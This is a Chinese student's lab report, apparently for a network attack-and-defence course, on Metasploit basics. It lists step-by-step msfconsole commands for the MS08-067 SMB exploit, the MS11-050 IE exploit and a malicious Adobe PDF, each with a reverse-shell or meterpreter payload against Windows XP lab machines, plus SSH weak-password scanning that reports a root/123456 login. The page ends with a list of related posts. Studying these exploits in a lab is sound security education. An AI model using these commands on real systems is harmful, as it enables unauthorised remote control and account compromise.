《网络攻防》 MSF基础应用
20145224陈颢文 《网络攻防》MSF基础应用
基础问题回答
用自己的话解释什么是exploit,payload,encode:
- exploit:攻击手段,是能使攻击武器(payload)的方法;
- payload:攻击武器,真正具有攻击性的代码;
- encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;
实验总结与体会
这次实验做的我好心累,也好欣慰,心累是因为想要成功的做出实验实在是太困难了,有个好靶机是关键;欣慰是感觉到我们正在使用的系统也并没有之前想象中的那么不堪,只要及时打补丁,还是能防住不少“小毛贼”的。
实践过程记录
MS08_067漏洞渗透攻击(主动攻击)
- 使用winXPenSP3为靶机;
- 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开msfconsole,输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;
- 使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
- 设置具体参数:set LHOST Kali的IP和set RHOST Windows的IP;
- show options查看所有参数是否设置正确,最后下令发起攻击- exploit:
  
  
MS11050安全漏洞(IE浏览器渗透攻击)
- 使用免考xp sp3为靶机;
- 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块;
- 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
- 设置具体参数:set LHOST Kali的IP、set LPORT 自定义端口号和set URIPATH 自定义域名;
- show options查看所有参数是否设置正确,最后下令发起攻击- exploit:
  
- 复制local IP,在靶机上使用IE浏览器进行访问:
  
 成功是成功了,但是结果和我预想的不太一样?!
  
  
 我猜啊,也许是我Kali的版本不一样,所以payload的功能也不同了~
Adobe阅读器渗透攻击(针对客户端)
- 使用winxpAttaker为靶机;
- 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,使用Adobe阅读器漏洞模块;
- 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
- 设置具体参数:set FILENAME 自定义文件名.pdf、set LHOST Kali的IP和set LPORT 自定义端口号;
- show options查看所有参数是否设置正确,最后输入- exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;
  
 什么?!粘贴不上去!!!那就快去把靶机里的虚拟机增强工具更新一下吧,别告诉我你不会!
- 使用back指令返回上一级菜单,再设置msf的监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主机IP
set LPORT 端口号
show options(检查所有数据是否正确)
exploit
- 最后在靶机中打开刚刚的PDF文件即可(时间略长);
  
成功应用任何一个辅助模块
- 显示所有的辅助模块show auxiliary(甚用,谁试谁知道);
- 通过上面三个实验不难看出msf的使用还是有套路可循的:进入模块->指定荷载->设置参数->发动攻击;
- 这次我尝试使用的是一个扫描SSH弱口令的一个辅助工具ssh_login,模块路径:auxiliary/scanner/ssh/ssh_login;
- 终端中打开msfconsole,输入命令use auxiliary/scanner/ssh/ssh_login,使用ssh_login模块;
- 使用show options查看所有参数,其中Required一栏中为“yes”的是必填参数,理论上把他们填好了这个模块也就能正常的使用了:
  
- show options查看所有参数是否设置正确,最后输入- exploit开始扫描:
  
 成功登陆到一个用户名为“root”、密码为“123456”的SSH账户!
《网络攻防》 MSF基础应用的更多相关文章
- 20145306 张文锦 网络攻防 web基础
		20145306 网络攻防 web基础 实验内容 WebServer:掌握Apache启停配置修改(如监听端口)前端编程:熟悉HTML+JavaScript.了解表单的概念编写不同的HTML网页,放入 ... 
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
		- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ... 
- 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用
		2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ... 
- 2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
		2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 payload/generic/sh ... 
- 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用
		2018-2019-2 20165315<网络攻防技术>Exp5 MSF基础应用 目录 一.实验内容 二.实验步骤 1.一个主动攻击实践 ms08_067(成功) 2.一个针对浏览器的攻击 ... 
- 20145236《网络攻防》Exp5 MSF基础应用
		20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ... 
- 20155201 网络攻防技术 实验五 MSF基础应用
		20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ... 
- 20155226《网络攻防》 Exp5 MSF基础应用
		20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ... 
- 20155235 《网络攻防》 实验五 MSF基础应用
		20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ... 
- 20155301 《网络攻防》 Exp5 MSF基础应用
		20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ... 
随机推荐
- VC++ 判断你的窗口是否置顶TopMost
			大家可能已经知道,使你的窗口置顶(TopMost)或者总是最前(Always on Top)的方法: C++ Code 12345 // Make topmost , SWP_NOMOVE | ... 
- spotlight on windows 监控
			1. spotlight on windows 安装 下载 https://pan.baidu.com/s/1qYi3lec Spotlight大家可以从其官方网站(http://www.quest. ... 
- iOS-layoutSubvies和drawRect何时调用
- 【BZOJ3190】[JLOI2013]赛车 单调栈+几何
			[BZOJ3190][JLOI2013]赛车 Description 这里有一辆赛车比赛正在进行,赛场上一共有N辆车,分别称为个g1,g2……gn.赛道是一条无限长的直线.最初,gi位于距离起跑线前进 ... 
- 12.php中无比坑爹的构造函数。
			当你在php类中,写一个构造方法时,记得,一定要用__这是两个下划线,而不是一个.......... <?php class Car { // function _construct() { / ... 
- IO流入门-第十章-DataInputStream_DataOutputStream
			DataInputStream和DataOutputStream基本用法和方法示例 /* java.io.DataOutputStream 数据字节输出流,带着类型写入 可以将内存中的“int i = ... 
- php中get_cfg_var()和ini_get()的用法及区别
			php里get_cfg_var()和ini_get()都是取得配置值的函数,当你需要获取php.ini里的某个选项的配置值时,这两个函数都都可以使用,得到的结果是一样的. 不过,get_cfg_var ... 
- scrapy item
			item item定义了爬取的数据的model item的使用类似于dict 定义 在items.py中,继承scrapy.Item类,字段类型scrapy.Field() 实例化:(假设定义了一个名 ... 
- ovs ovn 学习资料
			0.A Primer on OVN http://blog.spinhirne.com/2016/09/a-primer-on-ovn.html 1.Open Virtual Networking W ... 
- Python(数据库之约束表的关系)
			一.约束 约束条件与数据类型的宽度一样,都是可选参数 作用:用于保证数据的完整性和一致性 主要分为: RIMARY KEY (PK) 标识该字段为该表的主键,可以唯一的标识记录 FOREIGN KEY ... 
